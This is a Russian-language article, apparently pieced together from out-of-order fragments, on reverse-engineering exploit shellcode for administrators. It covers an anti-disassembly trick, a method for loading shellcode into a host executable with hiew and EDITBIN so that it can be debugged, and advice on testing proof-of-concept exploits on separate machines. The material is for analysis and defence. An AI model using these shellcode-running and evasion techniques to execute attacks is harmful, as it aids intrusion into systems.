После расшифровки shell-код можно дизассемблировать в обычном режиме. Начинаем анализ и… тут же вляпываемся в древний, но все еще работающий антидизассемблерный трюк:

seg000:019 loc_19:                              ; CODE XREF: seg000:0000001Cvp

seg000:019 6A

EB           push   FFFFFFEBh     ; скрытая команда в операнде

seg000:01B 4D              dec    ebp           ; продолжение скрытой команды

seg000:01C E8 F9 FF FF FF  call   loc_19+1      ; вызов в середину push

seg000:021 60              pusha                ; сохраняем все регистры



>>> Врезка интересные ссылки


q       системные вызовы NT:

o        наиболее полная коллекция системных вызовов всей линейки NT-подобных систем. крайне полезна для исследователей (на английском языке): http://www.metasploit.com/users/opcode/syscalls.html;

q       системные вызовы пот LINUX:

o        энциклопедия системных вызовов различных LINUX-подобных систем с прототипами, а кое-где и с комментариями (на английском языке): http://www.lxhp.in-berlin.de/lhpsyscal.html;



>>> Врезка как запустить shell-код под отладчиком


Статические методы исследования, к которым относятся дизассемблеры, не всегда удобны и во многих случаях отладка намного более предпочтительна. Однако, отладчиков, способных отлаживать shell-код не существует и приходится хитрить.

Пишем простую программу наподобие "hello, word!", компилируем. Открываем полученный исполняемый файл в hiew'е, привычным нажатием ENTER'а переключаемся в hex-режим, давим <F8> (header) и переходим в точку входа по <F5>. Нажимам <*> и выделяем курсором некоторое количество байт, такое — чтобы было не меньше размера shell-кода. Нажимаем <*> еще раз для завершения выделения и перемещаем курсор в начало выделенного блока (по умолчанию он будет раскрашен бордовым). Давим <Ctrl-F2>, в появившимся диалоговом окне вводим имя файла (в данном случае shellcode) и после завершения процесса загрузки блока с диска выходим из hiew'а. <F9> можно не нажимать, т. к. изменения сохраняются автоматически. Ругательство "End of input file" означает, что размер выделения превышает размер файла. В данном случае — это нормальная ситуация. Хуже, когда наоборот (если часть файла окажется незагруженной shell-код, естественно, работать не будет).

После этой несложной хирургической операции исполняемый файл можно отлаживать любым отладчиком, хоть soft-ice, хоть OllyDbg, но перед этим необходимо отредактировать атрибуты кодовой секции (обычно она называется .text), разрешив ее модификацию, иначе shell-код выбросит исключение при первой же попытки записи. Проще всего обработать файл с помощью утилиты EDITBIN, входящий в штатный комплект поставки компилятора Microsoft Visual C++, запустив ее следующим образом:

EDITBIN filename.exe /SECTION:.text,rwe



о дырах появляются постоянно. Стоит


Сообщения о дырах появляются постоянно. Стоит только заглянуть на www.securityfocus.com и… ужаснуться. Каждый день приносит по 10-20 новых дыр, затрагивающих практически весь спектр аппаратно-программного обеспечения. Вы до сих пор пользуетесь Лисом, считая его безопасным? Да как бы не так! За свое недолгое время существования он успел обрасти полусотней дыр, в том числе и критических. Ладно, оставим Лиса в покое и возьмем Оперу — почти два десятка ошибок (из которых 17 зарегистрировано на одном лишь securityfocus'е) быстро прочищают мозги от рекламной шелухи, позиционирующей Оперу не только как самый быстрый, но и по настоящему безопасный браузер. Уязвимости встречаются даже в текстовых браузуерах наподобие Lynx. Про Internet Exploder лучше вообще не вспоминать! Стоит ли после этого удивляться, что черви размножаются со скоростью лесного пожара и регулярно кладут целые сегменты сети, если не весь Интернет!
Программное обеспечение ненадежно. Это факт! Предоставленное самому себе, без ухода и надзора администратора оно быстро становится жертвой хакерских атак, превращаясь в рассадник вирусов и червей. Если уязвимость затрагивает те компоненты системы, без которых можно в принципе и обойтись (например, Message Queuing или RPC DCOM), их можно отключить или оградить брандмауэром. В противном случае, необходимо установить заплатку от "родного" производителя или сторонних поставщиков. Проблема в том, что официальные обновления зачастую выпускается лишь через несколько месяцев после официального же признания дыры. А сколько дыр так и остаются "непризнанными"?
Производителей программного обеспечения можно понять: ведь, прежде, чем признавать дыру дырой, необходимо убедиться, что это именно дыра, а вовсе не "авторское видение функциональности" и добиться устойчивого воспроизведения сбоя. У многих компаний существует политика замалчивания дыр и уязвимость либо молча устраняется с выходом очередной версии продукта (кумулятивного пакета обновления), либо не исправляется вообще! Яркий пример тому — уязвимость "MS IE (mshtml.dll) OBJECT tag vulnerability", обнаруженная 23 апреля 2006 (см. lists.grok.org.uk/pipermail/full-disclosure/2006-April/045422.html), все еще не признанная Microsoft.


Чтобы администратор мог спать спокойно и не дергался каждые пять минут, пытаясь обнаружить в логах брандмауэра "что-то необычное", первым делом необходимо выяснить — действительно ли вверенная ему система уязвима? Далеко не всем сообщениям о дырах можно верить. По общепринятой практике, первооткрыватель дыры должен подтвердить свои слова программой, демонстрирующий наличие уязвимости, но не совершающей ничего деструктивного. В зарубежной литературе она называется exploit proof-of-concept. Устоявшегося русского термина, увы, нет, поэтому приходится использовать то, что есть.
Часто к exploit'у прилагается перечень тестируемых (tested) и уязвимых (affected) платформ и все, что необходимо сделать — это запустить exploit на своей системе и посмотреть, справится ли он с ней или нет. Естественно, атаковать "живой" сервер или основную рабочую станцию может только самоубийца (или очень безответственный человек) и все потенциально опасные эксперименты следует выполнять на "копии" сервера/рабочей станции, специально предназначенной для тестовых целей. Под VM Ware и другими эмуляторами подобного типа exploit'ы лучше не запускать. Во-первых, ряд вредоносных exploit'ов распознает наличие виртуальных машин и отказываются работать. Во-вторых, вырваться из застенок виртуальной машины вполне реально (см. статью "побег из-под vm ware", которую можно скачать с моего мыщх'иного сервера ftp://nezumi.org.ru/pub/vm-escape.zip).
Отрицательный результат сам по себе еще ничего не доказывает. Даже если атака не удалась, у нас нет никаких оснований считать, что система находится в безопасности. Возможно, это просто exploit такой кривой, но стоит его слегка подправить, как список поражаемых систем заметно возрастет (тем более, что большинство exploit'ов закладываются на фиксированные адреса, варьирующие от версии к версии, поэтому exploit, разработанный для английской версии Windows 2000, может не работать в русской и наоборот).
К сожалению, зеркальная копия сервера есть не у всех, а ее создание требует денег, времени и т. д., поэтому сплошь и рядом exploit'ы запускаются на "живых" машинах. Но тогда хотя бы изучите код exploit'а, чтобы знать, что вы вообще запускаете, попутно устраняя ошибки, допущенные его разработчиками и адоптируя shell-код к своей системе, корректируя фиксированные адреса при необходимости.
Формально, администратор не обязан быть программистом и знания ассемблера от него никто требовать не вправе, но... жизнь заставляет!

Остальные анализируются аналогично. Главное— это


Вот мы и познакомились с основными приемами исследования exploit'ов. Остальные анализируются аналогично. Главное— это не теряться и всегда в любой ситуации помнить, что Интернет рядом с тобой! Достаточно лишь правильно составить запрос и все недокументированные структуры будут видны как на ладони, ведь недра операционных систем уже изрыты вдоль и поперек, так что крайне маловероятно встретить в shell-коде нечто принципиально новое. То есть, встретить как раз таки очень даже вероятно, но "новым" оно пробудет от силы неделю. Ну, пускай, десять дней. А после начнет расползаться по форумам, электронным и бумажным журналам, будет обсуждаться в курилках и хакерских кулуарах наконец. А затем Microsoft выпустит очередное исправление к своей замечательной системе и таким трудом добытые трюки станут неактуальны.